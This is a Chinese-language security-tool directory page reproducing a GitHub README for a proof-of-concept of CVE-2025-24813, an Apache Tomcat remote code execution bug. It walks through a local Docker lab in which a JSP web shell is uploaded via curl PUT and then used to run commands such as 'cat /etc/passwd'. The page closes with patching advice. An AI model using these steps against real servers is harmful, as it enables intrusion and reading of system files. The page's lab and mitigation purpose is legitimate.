Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/shivshantp/cve-2025-24813
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育红队Payload 开发实验室与实践
GitHubshivshantp/cve-2025-24813

CVE-2025-24813

Apache Tomcat PUT JSP RCE - CVE-2025-24813 - 漏洞利用与 PoC

查看仓库
581年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🚨 CVE-2025-24813 – Apache Tomcat PUT JSP RCE 漏洞利用

CVE Exploit-Status Platform Language Dockerized License

此仓库包含针对 CVE-2025-24813 的完整概念验证 (PoC) 漏洞利用代码,该漏洞是 Apache Tomcat 中通过 HTTP PUT 方法部署恶意 JSP Web Shell 的远程代码执行 (RCE) 漏洞。

🔥 此漏洞利用示例展示了攻击者如何通过文件上传和有效载荷执行在未妥善保护的 Tomcat 实例中实现 RCE。


📁 项目结构

root@kitploit:~
CVE-2025-24813/
├── docker/                         
│   ├── Dockerfile
│   └── web.xml                    
├── exploit/                        
│   ├── 1_exploit_cve_2025_24813.py
│   └── shell.jsp
├── screenshots/                    
│   ├── 1_tomcat_running.png
│   ├── 2_docker_started.png
│   ├── 3_upload_shell.png
│   ├── 4_run_python_exploit.png
│   ├── 5_access_shell_whoami.png
│   ├── 6_view_etc_passwd.png
│   ├── 7_run_uname.png
│   ├── 8_run_id.png
│   └── 9_run_pwd.png
├── .gitignore
├── LICENSE
└── README.md

🚀 漏洞利用步骤

1️⃣ 设置 Docker 环境

root@kitploit:~
cd docker
sudo docker build -t cve-24813-tomcat .
sudo docker run -it -p 8080:8080 cve-24813-tomcat

📸 Tomcat Running
📸 Docker Started


2️⃣ 上传恶意 JSP Shell

root@kitploit:~
curl -X PUT --upload-file exploit/shell.jsp http://localhost:8080/shell.jsp

📸 Upload JSP


3️⃣ 执行 Python 漏洞利用脚本

root@kitploit:~
python3 exploit/1_exploit_cve_2025_24813.py

📸 Run Exploit


4️⃣ 与 Web Shell 交互

root@kitploit:~
http://localhost:8080/shell.jsp?cmd=id
http://localhost:8080/shell.jsp?cmd=uname -a
http://localhost:8080/shell.jsp?cmd=cat /etc/passwd

📸 whoami
📸 passwd
📸 uname
📸 id
📸 pwd


🧩 功能特性

  • 🔧 基于 Docker 的易受攻击 Apache Tomcat 服务器设置
  • 📥 滥用 PUT 方法上传并触发 JSP Web Shell
  • 🐍 基于 Python 的 PoC 脚本
  • 📸 完整截图步骤指南
  • 📚 适用于红队模拟与教育

🛠️ 如何修补(缓解措施)

  • 🚫 在 web.xml 或服务器配置中禁用 PUT/DELETE 方法
  • ⛓️ 使用安全管理器或更严格的 Servlet 容器控制
  • 🔐 应用文件级上传过滤与验证
  • 🧱 设置 WAF 以阻止未经授权的 PUT 请求
  • ✅ 升级至经过安全修补的 Apache Tomcat 版本

⚠️ 免责声明

本项目仅供 教育和研究目的 使用。未经授权在您不拥有或无权测试的系统上进行测试、利用或使用属违法行为且不道德。


👨‍💻 作者

Shivshant Patil
认证道德黑客 (CEH v13)
计算机工程学士毕业生
🔗 LinkedIn
🔗 GitHub

下载工具